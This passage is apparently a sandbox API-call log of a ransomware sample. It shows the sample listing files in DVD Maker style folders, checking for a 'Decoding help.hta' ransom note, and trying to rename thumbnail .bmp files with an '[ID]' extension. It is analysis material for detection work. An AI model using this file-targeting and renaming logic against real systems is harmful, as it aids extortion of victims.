ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Push", cAlternateFileName="")) returned 1 [0055.324] lstrcmpW (lpString1=".", lpString2="Push") returned -1 [0055.324] lstrcmpW (lpString1="..", lpString2="Push") returned -1 [0055.324] lstrcmpiW (lpString1="windows", lpString2="Push") returned 1 [0055.324] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.324] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Push" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" [0055.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*.*" [0055.324] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0055.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10fcf5c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x830 [0055.760] CloseHandle (hObject=0x830) returned 1 [0055.760] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rectangles", cAlternateFileName="RECTAN~1")) returned 1 [0055.760] lstrcmpW (lpString1=".", lpString2="Rectangles") returned -1 [0055.760] lstrcmpW (lpString1="..", lpString2="Rectangles") returned -1 [0055.760] lstrcmpiW (lpString1="windows", lpString2="Rectangles") returned 1 [0055.763] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Rectangles" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" [0055.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*.*" [0055.763] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0055.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a930a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x830 [0055.778] CloseHandle (hObject=0x830) returned 1 [0055.778] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_babypink_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0055.780] lstrcpyW (in: lpString1=0x2a998bb0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.780] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.780] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0055.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0055.780] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0055.780] lstrlenW (lpString="rectangle_babypink_Thumbnail.bmp") returned 32 [0055.780] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0055.780] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.780] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.781] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_babypink_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" [0055.781] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" [0055.781] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0055.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.948] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0058.948] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.948] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0058.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0058.948] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0058.948] lstrlenW (lpString="rectangle_glass_Thumbnail.bmp") returned 29 [0058.948] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0058.948] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.948] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_glass_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" [0058.948] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" [0058.949] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.949] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eac17af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eac17af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_highlights_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0058.949] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.949] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.949] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0058.949] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0058.949] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_highlights_Thumbnail.bmp") returned -1 [0058.949] lstrlenW (lpString="rectangle_highlights_Thumbnail.bmp") returned 34 [0058.949] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0058.949] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.949] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.949] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_highlights_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" [0058.949] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" [0058.949] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.949] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eae790c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eae790c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_performance_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0058.950] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.950] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0058.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0058.950] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_performance_Thumbnail.bmp") returned -1 [0058.950] lstrlenW (lpString="rectangle_performance_Thumbnail.bmp") returned 35 [0058.950] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0058.950] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.950] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_performance_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" [0058.950] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" [0058.950] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.950] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb0da69, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb0da69, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_photo_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0058.950] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.950] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0058.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0058.950] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_photo_Thumbnail.bmp") returned -1 [0058.950] lstrlenW (lpString="rectangle_photo_Thumbnail.bmp") returned 29 [0058.950] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0058.950] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0058.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0058.951] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_photo_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" [0058.951] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" [0058.951] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.951] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.807] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea754f5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea754f5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rectangle_plain_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0060.885] lstrcpyW (in: lpString1=0x2a7302b8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0060.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0060.885] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rectangle_plain_Thumbnail.bmp") returned -1 [0060.885] lstrlenW (lpString="rectangle_plain_Thumbnail.bmp") returned 29 [0060.886] lstrcmpiW (lpString1="[ID]", lpString2=".bmp") returned 1 [0060.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0060.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0060.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="rectangle_plain_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" [0060.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program 